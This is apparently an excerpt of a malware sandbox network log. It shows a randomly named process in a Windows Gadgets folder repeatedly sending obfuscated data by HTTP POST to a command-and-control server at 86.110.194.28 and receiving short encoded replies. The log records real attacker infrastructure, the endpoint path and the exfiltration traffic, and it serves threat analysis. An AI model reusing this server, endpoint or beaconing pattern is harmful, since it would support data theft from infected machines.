                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  30 | 192.168.2.4 | 49771 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:49.399144888 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:49.754292965 CET | 2576 | OUT | Data Raw: 5b 57 5e 58 58 5b 55 5b 54 5b 59 5a 5b 54 57 5b 5f 52 5a 5e 52 57 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^XX[U[T[YZ[TW[_RZ^RWP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+%\"0S2+>3'9[2?5V '=P 8[%)43$T?9#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:07:50.080612898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:50.210144043 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  31 | 192.168.2.4 | 49772 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:50.297130108 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  32 | 192.168.2.4 | 49773 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:50.403146982 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:50.754406929 CET | 2576 | OUT | Data Raw: 5e 51 5e 5f 58 59 50 58 54 5b 59 5a 5b 5f 57 52 5f 51 5a 5d 52 52 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^_XYPXT[YZ[_WR_QZ]RRPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&)>-]5;28E>]*0'"&/1Q!T48\38@30+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:51.098463058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:51.229823112 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  33 | 192.168.2.4 | 49774 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:51.358062983 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:51.707441092 CET | 2576 | OUT | Data Raw: 5b 51 5b 5d 58 5f 50 5a 54 5b 59 5a 5b 52 57 5f 5f 56 5a 58 52 53 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q[]X_PZT[YZ[RW__VZXRSP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+X5Z!0&,<=>Y3=1)5$%!8+$:$$??#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:52.058923960 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:52.190211058 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:51 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  34 | 192.168.2.4 | 49776 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:52.317703009 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:52.695858002 CET | 2576 | OUT | Data Raw: 5e 52 5e 5a 5d 5d 50 58 54 5b 59 5a 5b 5f 57 58 5f 56 5a 59 52 5c 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R^Z]]PXT[YZ[_WX_VZYR\PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(5_6,V1,=>X3$9[%Y:5Q#^/380<<9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:52.994966030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:53.122051954 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:52 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  35 | 192.168.2.4 | 49777 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:53.255954981 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:53.613744974 CET | 2576 | OUT | Data Raw: 5b 56 5e 51 5d 5e 50 51 54 5b 59 5a 5b 56 57 58 5f 53 5a 59 52 5d 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^Q]^PQT[YZ[VWX_SZYR]PI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A?#:%<#>)'$:2&!=V7<%90<$S)9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:53.947146893 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:54.077030897 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:53 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  36 | 192.168.2.4 | 49778 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:54.211524963 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:54.566782951 CET | 2576 | OUT | Data Raw: 5b 52 5b 5a 58 57 50 5d 54 5b 59 5a 5b 51 57 5a 5f 54 5a 54 52 51 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R[ZXWP]T[YZ[QWZ_TZTRQPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<>5\'20*+Y0'&'?%S!%P 8?$9$<#+)#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:54.897229910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:55.030688047 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:54 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                  37 | 192.168.2.4 | 49779 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                  Jan 3, 2025 09:07:55.175259113 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49780 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:55.435167074 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2140
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:55.789875984 CET2140OUTData Raw: 5b 56 5b 5b 5d 5b 50 50 54 5b 59 5a 5b 56 57 53 5f 51 5a 54 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V[[][PPT[YZ[VWS_QZTR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<1["U2<B(8"[04-1?)!!+?'7'V<#Y'$X.%
Jan 3, 2025 09:07:56.121201038 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:56.250076056 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 24 13 25 2b 2e 5a 3d 3f 2f 1d 25 23 32 03 21 20 33 05 2f 0e 3a 44 22 3c 3e 00 31 3b 3b 09 2b 04 2d 1b 29 33 0f 55 37 58 3d 54 28 30 28 5d 03 10 39 11 28 03 2b 5a 2a 3d 2a 06 2e 19 3c 02 24 51 3f 00 3d 0a 3d 50 32 3f 3e 56 36 13 2f 1f 29 33 0b 13 27 05 24 5e 3c 33 23 5b 27 3d 20 54 0b 17 27 1d 33 20 24 06 26 2b 35 10 3d 27 30 5b 24 04 0f 50 35 3f 31 09 37 39 27 03 2d 23 39 57 24 5e 25 56 3e 00 30 0b 24 2a 0f 03 24 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: $%+.Z=?/%#2! 3/:D"<>1;;+-)3U7X=T(0(]9(+Z*=*.<$Q?==P2?>V6/)3'$^<3#['= T'3 $&+5='0[$P5?179'-#9W$^%V>0$*$+.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49781 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:55.925221920 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:56.270243883 CET2576OUTData Raw: 5b 5d 5e 58 58 5c 55 5a 54 5b 59 5a 5b 52 57 52 5f 55 5a 5e 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^XX\UZT[YZ[RWR_UZ^RRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(-!\69?%0*+6Y$B%&5P579 (3$)'0/(#Y'$X.5
Jan 3, 2025 09:07:56.627769947 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:56.762067080 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:56 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49783 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:56.882143021 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:57.238661051 CET2576OUTData Raw: 5b 53 5b 5b 58 5a 50 5d 54 5b 59 5a 5b 52 57 5f 5f 57 5a 5f 52 53 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [S[[XZP]T[YZ[RW__WZ_RSPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<!_#*32Z D)2^0\%<% $& ($\''$'+)#Y'$X.5
Jan 3, 2025 09:07:57.566042900 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:57.698079109 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49789 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:57.836497068 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:58.192090034 CET2576OUTData Raw: 5b 5c 5b 5d 5d 5c 55 5a 54 5b 59 5a 5b 51 57 5f 5f 52 5a 55 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\[]]\UZT[YZ[QW__RZUR]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?1^!:S%$E=+04\&Y)"B%P7;039$B$<$U()#Y'$X.9
Jan 3, 2025 09:07:58.525327921 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:58.654078007 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49799 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:07:58.796608925 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2564
Expect: 100-continue
Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:59.146219015 CET2564OUTData Raw: 5b 56 5e 5c 58 5b 50 50 54 5b 59 5a 5b 57 57 5b 5f 5c 5a 5f 52 52 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^\X[PPT[YZ[WW[_\Z_RRPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B(.1\";&,#*)0'!\'? 4 ;,]':8&/V?#Y'$X.
Jan 3, 2025 09:07:59.482178926 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:07:59.609999895 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:07:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49806 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
